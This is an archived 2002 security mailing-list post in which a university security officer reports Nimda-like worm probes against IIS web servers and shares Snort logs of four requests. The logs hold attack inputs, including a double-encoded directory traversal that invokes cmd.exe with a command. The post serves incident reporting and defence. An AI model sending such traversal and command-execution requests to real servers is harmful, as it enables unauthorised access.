Over the last few days I have been seeing increasing numbers (now up to 3 or 4 per hour) of nimda like attacks against web servers. Unlike nimda, which normally does 15 probes, this new variant only does 4 probes, as illustrated in these snort logs: [**] WEB-IIS CodeRed v2 root.exe access [**] 04/30-21:13:15.039903 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x7E 64.252.104.224:3817 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29214 IpLen:20 DgmLen:112 DF ***AP*** Seq: 0x4262A517 Ack: 0x6CBA93E Win: 0x4248 TcpLen: 20 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c 6C 6F 73 65 0D 0A 0D 0A lose.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= [**] WEB-IIS cmd.exe access [**] 04/30-21:13:19.727331 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x86 64.252.104.224:3905 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29884 IpLen:20 DgmLen:120 DF ***AP*** Seq: 0x42AA87EB Ack: 0x67C77D4 Win: 0x4248 TcpLen: 20 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] WEB-IIS cmd.exe access [**] 04/30-21:13:20.547883 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x86 64.252.104.224:4080 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30005 IpLen:20 DgmLen:120 DF ***AP*** Seq: 0x43380090 Ack: 0x74BEA3A Win: 0x4248 TcpLen: 20 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] WEB-IIS _mem_bin access [**] 04/30-21:13:23.055837 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0xAB 64.252.104.224:4197 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30401 IpLen:20 DgmLen:157 DF ***AP*** Seq: 0x4394DC62 Ack: 0x76C208B Win: 0x4248 TcpLen: 20 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/.. 25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E %255c../..%255c. 2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E ./..%255c../winn 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 xe?/c+dir HTTP/1 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 onnnection: clos 65 0D 0A 0D 0A e.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Has anyone caught one of these in a honey pot? If it really is something new then the Anti Virus vendors need to know about it... -- Russell Fulton, Computer and Network Security Officer The University of Auckland, New Zealand ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed May 01 2002 - 08:40:23 PDT